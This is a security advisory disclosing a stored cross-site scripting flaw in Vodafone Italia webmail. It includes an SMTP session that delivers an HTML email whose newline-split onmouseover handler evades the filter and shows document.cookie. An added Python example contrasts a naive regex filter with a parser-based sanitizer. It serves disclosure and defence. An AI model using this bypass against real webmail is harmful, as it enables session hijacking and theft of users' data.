Vodafone Italia Webmail Cross Site Scripting

2017-07-13T00:00:00
ID PACKETSTORM:143360
Type packetstorm
Reporter theMiddle
Modified 2017-07-13T00:00:00

Description

# Title: Vodafone Webmail - Stored Cross-Site Scripting  
# Date: 2017-07-14  
# Exploit Author: theMiddle / https://github.com/theMiddleBlue  
# Website: https://web.mail.vodafone.it  
  
  
1. Description  
The Vodafone Italia webmail (web.mail.vodafone.it) suffers from a stored
cross-site scripting vulnerability. The webmail's XSS filter can be bypassed
by sending an e-mail message whose HTML body is formatted as shown below: the
event-handler attribute name (onmouseover) and its "=" are separated by a
newline. A browser's HTML parser treats that newline as ordinary whitespace
and still attaches the handler, while the filter evidently does not recognise
the split attribute and lets the markup through. The script then runs in the
webmail's origin as soon as the recipient opens the message and moves the
mouse over it; the 600px-high div makes that hard to avoid. The proof of
concept only displays document.cookie, but the same injection point can run
any script in the victim's webmail session.  
  
After years of no answer from Vodafone, I decided to disclose it in order  
to alert users and companies that use this webmail.  
  
  
2. Exploit vulnerability  
-------------------------------------------  
# telnet mx.vodafone.arubamail.it 25  
Trying 62.149.178.10...  
Connected to mx.vodafone.arubamail.it.  
Escape character is '^]'.  
220 mxcmd02.vf.aruba.it bizsmtp ESMTP server ready  
HELO example.com  
250 mxcmd02.vf.aruba.it hello [*****], pleased to meet you  
MAIL FROM: themiddle@protonmail.ch  
250 2.1.0 <themiddle@protonmail.ch> sender ok  
RCPT TO: *****@vodafone.it  
250 2.1.5 <*****@vodafone.it> recipient ok  
DATA  
354 enter mail, end with "." on a line by itself  
Subject: test xss  
From: theMiddle <themiddle@protonmail.ch>  
To: *****@vodafone.it  
Content-Type: text/html; charset=utf-8  
  
<div onmouseover  
="alert(document.cookie);"  
style  
="height:600px;">  
test  
</div>  
  
.  
250 2.0.0 kJLA1v0060an1Af01JLXCz mail accepted for delivery  
QUIT  
221 2.0.0 mxcmd02.vf.aruba.it bizsmtp closing connection  
Connection closed by foreign host.  
--------------------------------------------  
  
A screenshot of the JavaScript executing in the Chrome browser:  
http://i.imgur.com/Ap4NK9c.png  
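The bypass above lives in the gap between what a pattern-matching filter looks for and what a browser's HTML tokenizer accepts. The Python script below is an added example, not code from the advisory or from Vodafone. It models a hypothetical blacklist filter of the kind the payload slips past (the real filter's rule is not published, so the regex is an assumption) and contrasts it with a sanitizer built on the standard library's html.parser, which tokenises attributes the way a browser does and therefore sees the split onmouseover attribute and removes it. The sample message body is constructed to match the advisory's payload.

```python
import re
from html import escape
from html.parser import HTMLParser

# Constructed sample body reproducing the advisory's trick: the event-handler
# attribute name and its '=' are separated by a newline.
PAYLOAD = (
    '<div onmouseover\n'
    '="alert(document.cookie);"\n'
    'style\n'
    '="height:600px;">\n'
    'test\n'
    '</div>'
)

# Hypothetical blacklist rule (assumption: Vodafone's real filter rule is not
# published). It recognises 'on<name>=' with optional spaces in between, which
# is enough for '<div onmouseover = "..."' but not for a newline before '='.
NAIVE_HANDLER_RE = re.compile(r"""[\s"']on\w+ *=""", re.IGNORECASE)


def naive_filter_blocks(html: str) -> bool:
    """True if the blacklist regex fires; misses the newline-split attribute."""
    return NAIVE_HANDLER_RE.search(html) is not None


# Attributes whose value a browser will treat as a URL and may execute.
URL_ATTRS = {'href', 'src', 'action', 'formaction', 'xlink:href'}


def _is_script_url(value: str) -> bool:
    # Browsers drop tab/CR/LF inside the scheme and ignore leading whitespace,
    # so normalise the same way before comparing ('java\nscript:' counts).
    scheme = re.sub(r'[\t\r\n]', '', value).lstrip().lower()
    return scheme.startswith(('javascript:', 'vbscript:'))


class EventAttrStripper(HTMLParser):
    """Tokenises markup like a browser (html.parser accepts any whitespace,
    newlines included, between an attribute name and '='), drops every on*
    attribute and every script-scheme URL attribute, and re-serialises the
    remaining tags, attributes and text with proper escaping."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropped = []  # names of attributes removed, for logging/alerting

    def _emit_tag(self, tag, attrs, self_closing=False):
        parts = [tag]
        for name, value in attrs:   # html.parser lowercases names, unescapes values
            lname = name.lower()
            if lname.startswith('on'):
                self.dropped.append(lname)
                continue
            if lname in URL_ATTRS and value is not None and _is_script_url(value):
                self.dropped.append(lname)
                continue
            parts.append(lname if value is None
                         else f'{lname}="{escape(value, quote=True)}"')
        self.out.append('<' + ' '.join(parts) + (' />' if self_closing else '>'))

    def handle_starttag(self, tag, attrs):
        self._emit_tag(tag, attrs)

    def handle_startendtag(self, tag, attrs):
        self._emit_tag(tag, attrs, self_closing=True)

    def handle_endtag(self, tag):
        self.out.append(f'</{tag}>')

    def handle_data(self, data):
        self.out.append(escape(data, quote=False))

    # Comments, doctypes and processing instructions carry nothing a mail body
    # needs, and dropping them removes a classic place to hide markup.
    def handle_comment(self, data):
        pass

    def handle_decl(self, decl):
        pass

    def handle_pi(self, data):
        pass


def sanitize_html(html: str):
    """Return (cleaned markup, list of attribute names that were removed)."""
    parser = EventAttrStripper()
    parser.feed(html)
    parser.close()
    return ''.join(parser.out), parser.dropped


if __name__ == '__main__':
    print('naive filter blocks payload:', naive_filter_blocks(PAYLOAD))
    clean, dropped = sanitize_html(PAYLOAD)
    print('parser-based sanitizer dropped:', dropped)
    print(clean)
```

The design point is that a filter must parse the message the way the rendering browser will, not scan it for strings: the regex answers "no handler here" for the advisory's payload, while the tokenizer-based pass returns the div with only its style attribute. html.parser is tolerant but not a full HTML5 tokenizer, so a production webmail should go further and allow-list tags and attributes (rather than blacklist on* and script URLs as this example does) and serve the body with a Content-Security-Policy that forbids inline scripts.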
  
  
3. Timeline  
2014-10-31: Initial report to abuse Vodafone e-mail address (no answer received).  
2015-06-25: Second contact via social network (no answer received).  
2017-07-13: Third e-mail to italy.abuse@mail.vodafone.it (no answer received).  
2017-07-14: Disclosure.  